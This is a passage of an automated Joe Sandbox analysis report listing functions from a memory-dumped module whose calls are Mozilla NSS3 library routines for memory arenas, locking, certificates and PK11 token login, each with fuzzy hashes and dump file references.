Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: fb9d85f0257ebca63da4501d056e970c425422be09673a17a87abef06d324c3c
Instruction ID: 889074574958f8c68e1102e813601f548631229ef9fd70ed23527f5635aaad70
Opcode Fuzzy Hash: fb9d85f0257ebca63da4501d056e970c425422be09673a17a87abef06d324c3c
Instruction Fuzzy Hash: 81316875A0020A5BEB00CF6DDC81BEFB3B8FF85348F540228EC15A7280DB75D92586A9

Function 6C59DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C59DDB1,?,00000000), ref: 6C59DDF4

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C59DDB1,?,00000000), ref: 6C59DE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C59DDB1,?,00000000), ref: 6C59DE17

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C59DE80

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: ba8d6c5c0e88d7b5ab74ce0a729b8e4b6b45ec34700a98bd6c41ff023b85270a
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 8431A4B6901782DBE700CF57DC80656F7E4BFE5318B24866AD81987B01E770F5A4CB90

Function 6C58FE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C565ADC,?,00000000,00000001,?,?,00000000,?,6C55BA55,?,?), ref: 6C58FE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C58FE5F
PR_Unlock.NSS3(78831D74), ref: 6C58FEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C58FED6

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 72a73feef7b02897949d9b3fd2df8d9c5cf444e0e41c294fd18b780adc64f8bd
Instruction ID: 94c82ffe9c11e2969f6d82199f30cad602b00aa8a6001f7f442e3b227cb7dcb2
Opcode Fuzzy Hash: 72a73feef7b02897949d9b3fd2df8d9c5cf444e0e41c294fd18b780adc64f8bd
Instruction Fuzzy Hash: 6D210131E02626ABD7909F65DC44BAA77B4BF49358F040224DD05A7E42E730ED68CBE1

Function 6C593F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C593440: PK11_GetAllTokens.NSS3 ref: 6C593481
Part of subcall function 6C593440: PR_SetError.NSS3(00000000,00000000), ref: 6C5934A3
Part of subcall function 6C593440: TlsGetValue.KERNEL32 ref: 6C59352E
Part of subcall function 6C593440: EnterCriticalSection.KERNEL32(?), ref: 6C593542
Part of subcall function 6C593440: PR_Unlock.NSS3(?), ref: 6C59355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C57E80C,00000000,00000000,?,?,?,?,6C588C5B,-00000001), ref: 6C593FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C57E80C,00000000,00000000,?,?,?,?,6C588C5B,-00000001), ref: 6C593FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C57E80C,00000000,00000000,?,?,?,?,6C588C5B,-00000001), ref: 6C593FFE
PR_SetError.NSS3 ref: 6C59401A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: 39399ef66b07a677e409515907293b011ee0f130a6ce2a1f447531779e159651
Instruction ID: 4e75e6f5285b29f59ff7bbf1587c2edf83dcd1edfbba117f4956ee02e1f9e2df
Opcode Fuzzy Hash: 39399ef66b07a677e409515907293b011ee0f130a6ce2a1f447531779e159651
Instruction Fuzzy Hash: FD315E71904744CFD710EF69D98466EBBF0FF89354F11596AD8998BB10EB30E884CB91

Function 6C584FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C58B60F,00000000), ref: 6C585003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C58B60F,00000000), ref: 6C58501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C58B60F,00000000), ref: 6C58504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C58B60F,00000000), ref: 6C585064

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 7b51258ce109fbf94df0dc4cd533d90b5069a96f4d6c1afd6783ff725675c503
Instruction ID: d8523e296e941e89fe5aebdc15d47eaa1d35fa4fe7eda58c938e181796ac8eb4
Opcode Fuzzy Hash: 7b51258ce109fbf94df0dc4cd533d90b5069a96f4d6c1afd6783ff725675c503
Instruction Fuzzy Hash: BD3127B4A05616DFDB00EF69C88466ABBF4FF48304F508529D85AD7700E730E894CBD1

Function 6C5A9F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C5AA71A,FFFFFFFF,?,?), ref: 6C5A9FAB

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C5AA71A,6C5AA71A,00000000), ref: 6C5A9FD9

Part of subcall function 6C5A1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A136A
Part of subcall function 6C5A1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A137E
Part of subcall function 6C5A1340: PL_ArenaGrow.NSS3(?,6C53F599,?,00000000,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?), ref: 6C5A13CF
Part of subcall function 6C5A1340: PR_Unlock.NSS3(?,?,6C54895A,00000000,?,00000000,?,00000000,?,00000000,?,6C53F599,?,00000000), ref: 6C5A145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C5AA71A,6C5AA71A,00000000), ref: 6C5AA009
PR_SetError.NSS3(FFFFE013,00000000,6C5AA71A,6C5AA71A,00000000), ref: 6C5AA045

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: 2d3a9c177e88847a304ae7696b979bcd2c0d4568b48b69ad71d9baf49aebf9b6
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 982153B46002069BE7009F97DC50F6AB7A9BB8535CF148129992987B81F775E819CF90

Function 6C5B2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5B2E08

Part of subcall function 6C5A14C0: TlsGetValue.KERNEL32 ref: 6C5A14E0
Part of subcall function 6C5A14C0: EnterCriticalSection.KERNEL32 ref: 6C5A14F5
Part of subcall function 6C5A14C0: PR_Unlock.NSS3 ref: 6C5A150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C5B2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C5B2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5B2E95

Part of subcall function 6C5A1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5488A4,00000000,00000000), ref: 6C5A1228
Part of subcall function 6C5A1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C5A1238
Part of subcall function 6C5A1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5488A4,00000000,00000000), ref: 6C5A124B
Part of subcall function 6C5A1200: PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0,00000000,00000000,00000000,?,6C5488A4,00000000,00000000), ref: 6C5A125D
Part of subcall function 6C5A1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C5A126F
Part of subcall function 6C5A1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C5A1280
Part of subcall function 6C5A1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C5A128E
Part of subcall function 6C5A1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C5A129A
Part of subcall function 6C5A1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C5A12A1

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: da3f2c9896abf30caf0ce7023f99b0c0c2d11443d4d15979c4bb95a5c7875e4a
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: BC21C5B5D103458BEB00CF569D587BB3A646FD134CF110269FD086B652F7B1D99882A1

Function 6C581870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5818A6
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C566C34,?,?,00000001,00000000,00000007,?), ref: 6C5818B6
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C566C34,?,?), ref: 6C5818E1
PR_SetError.NSS3(00000000,00000000), ref: 6C5818F9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: c26b38a6f5cb5a521a52430ce532a7b1d62d7e603c6e6971ec2267043780df95
Instruction ID: 96cb51fc8c78b764855668d1d1dabd84ab25a7b5dad3b1c658f5f6738f355ba7
Opcode Fuzzy Hash: c26b38a6f5cb5a521a52430ce532a7b1d62d7e603c6e6971ec2267043780df95
Instruction Fuzzy Hash: 0021D071E002199BDB00AF68DC85AEE7B74FF0A318F440169ED1667701EB35A928CBE1

Function 6C56ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C56ACC2

Part of subcall function 6C542F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C542F0A
Part of subcall function 6C542F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C542F1D

Part of subcall function 6C542AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C540A1B,00000000), ref: 6C542AF0
Part of subcall function 6C542AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C542B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C56AD5E

Part of subcall function 6C5857D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C54B41E,00000000,00000000,?,00000000,?,6C54B41E,00000000,00000000,00000001,?), ref: 6C5857E0
Part of subcall function 6C5857D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C585843

CERT_DestroyCertList.NSS3(?), ref: 6C56AD36

Part of subcall function 6C542F50: CERT_DestroyCertificate.NSS3(?), ref: 6C542F65
Part of subcall function 6C542F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C542F83

free.MOZGLUE(?), ref: 6C56AD4F

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 50fb3cac0ed79a90c8461eb3b41d37d3dc473c37176cc4e88f420db1a8a1316f
Instruction ID: ce056defaf60a1e2515e555fdda94b2d3d968e26d5c2221a025ec69498c7da0d
Opcode Fuzzy Hash: 50fb3cac0ed79a90c8461eb3b41d37d3dc473c37176cc4e88f420db1a8a1316f
Instruction Fuzzy Hash: 2321F3B1D002249BEB00DF66DC454EEB7B4EF45208F458028D805BBB11FB31AE49CBA5

Function 6C593C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C593C9E
EnterCriticalSection.KERNEL32(?), ref: 6C593CAE
PR_Unlock.NSS3(?), ref: 6C593CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C593D02

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0489f057890100e01165b250f690acf2fb61cd1e3efa45aff6e39b13a7491744
Instruction ID: ba0040d193584d646320c1e894982e0e2b91a5fbad6c10bfc860a765977e961f
Opcode Fuzzy Hash: 0489f057890100e01165b250f690acf2fb61cd1e3efa45aff6e39b13a7491744
Instruction Fuzzy Hash: 2D11D675A00654EFD700DF25DC88A9A3778EF59368F5545A1EC098B712E730ED44C7E1

Function 6C59ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C59F0AD,6C59F150,?,6C59F150,?,?,?), ref: 6C59ECBA

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C59ECD1

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C59ED02

Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C59ED5A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: bac1c5f70ba5d7237a23e4048dfb1c071f9d755c9f05799aec2d9b470187e878
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: FD21D4B59007829BE700CF26DD44B56B7E4BFE5308F15C259E81C87661EBB0E995C6D0

Function 6C56C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6C56C890

Part of subcall function 6C568F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FAF
Part of subcall function 6C568F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FD1
Part of subcall function 6C568F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C568FFA
Part of subcall function 6C568F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C569013
Part of subcall function 6C568F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C569042
Part of subcall function 6C568F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C56905A
Part of subcall function 6C568F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C569073
Part of subcall function 6C568F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C55DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C569111

PR_GetCurrentThread.NSS3 ref: 6C56C8B2

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C56C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C56C8EB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: b2ca72e882ea49dcba4c440e2fc5e258e937ed875f594cca503098e0d95e0bba
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 2F01CC76E01111A7DB1026B76C80ABF35699F8625CF040135FD04A7F22F751AC1893E2

Function 6C5CEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C5B7FFA,?,6C5B9767,?,8B7874C0,0000A48E), ref: 6C5CEDD4
